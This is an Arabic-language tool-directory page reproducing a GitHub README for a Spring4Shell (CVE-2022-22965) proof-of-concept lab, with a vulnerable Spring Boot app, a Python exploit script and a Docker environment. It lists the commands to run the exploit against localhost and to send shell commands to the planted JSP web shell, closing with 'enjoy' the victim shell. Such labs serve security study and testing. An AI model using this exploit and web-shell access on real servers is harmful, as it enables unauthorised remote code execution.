Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-22965 — استغلال إثبات المفهوم لـ CVE-2022-22965 (Spring4Shell) مع تطبيق Spring Boot ضعيف ونص استغلال بايثون وبيئة مختبر قائمة على Docker للاختبار. | Kitploit
أدوات/GitHubGitHub/mariomamo/cve-2022-22965
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmariomamo/cve-2022-22965

CVE-2022-22965

استغلال إثبات المفهوم لـ CVE-2022-22965 (Spring4Shell) مع تطبيق Spring Boot ضعيف ونص استغلال بايثون وبيئة مختبر قائمة على Docker للاختبار.

عرض المستودع
511منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

👾 CVE-2022-22965

هذا إثبات مفهوم لاستغلال ثغرة CVE-2022-22965 (spring4shell). يتكون من:

  • تطبيق Springboot قابل للاستغلال؛
  • سكربت استغلال مكتوب بلغة python؛
  • تطبيق آمن لاختبار أن الاستغلال لا يعمل؛
  • ملف dockerfile لتشغيل التطبيق القابل للاستغلال واختبار الاستغلال؛

🔧المساهمون

  • [🇮🇹] Mario Offertucci؛
  • [🇮🇹] Antonio Donnarumma؛

⚙️ المتطلبات الأساسية

  • Docker: يُستخدم لتشغيل حاوية tomcat مع تطبيق Springboot؛
  • Python: يُستخدم لتشغيل الاستغلال؛

1️⃣ تشغيل تطبيق Springboot

يوجد داخل المجلد الجذر للمشروع ملف Dockerfile ينشئ صورة tomcat وينسخ ملفي vulnerable_app/target/spring4shell.war وsafe_app/target/safeapp.war إلى مجلد /usr/local/tomcat/webapps، لذلك كل ما عليك فعله هو بناء الصورة وتشغيل الحاوية.

بناء صورة tomcat

root@kitploit:~
docker build -t cve_2022_22965 .

تشغيل الحاوية

root@kitploit:~
docker run -p 8080:8080 -d --name springshell cve_2022_22965

التحقق من استجابة التطبيق

root@kitploit:~
curl --location --request POST http://localhost:8080/spring4shell/vulnerability/exploit?name=Elliot%20Alderson

إذا رأيت هذه الاستجابة

root@kitploit:~
This is Elliot Alderson

فإن التطبيق يعمل بنجاح.

2️⃣ الآن يمكنك تشغيل الاستغلال

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit

يمكنك اختياريًا تحديد اسم ملف jsp المُحقن، لكنه ليس إلزاميًا. مثال

root@kitploit:~
cd exploits
python spring4shell.py http://localhost:8080/spring4shell/vulnerability/exploit -f exploit.jsp

إذا لم تحدد اسمًا، فسيتم إنشاء اسم عشوائي.

سترى ما يلي في سطر الأوامر
بعد تنفيذ الاستغلال، يمكنك أيضًا إرسال أمر عبر طلب HTTP GET

root@kitploit:~
http://localhost:8080/exploit.jsp?pwd=pass&cmd=ls

لقد نجحت في فتح شل على جهاز الضحية! استمتع.

تنزيل الأداة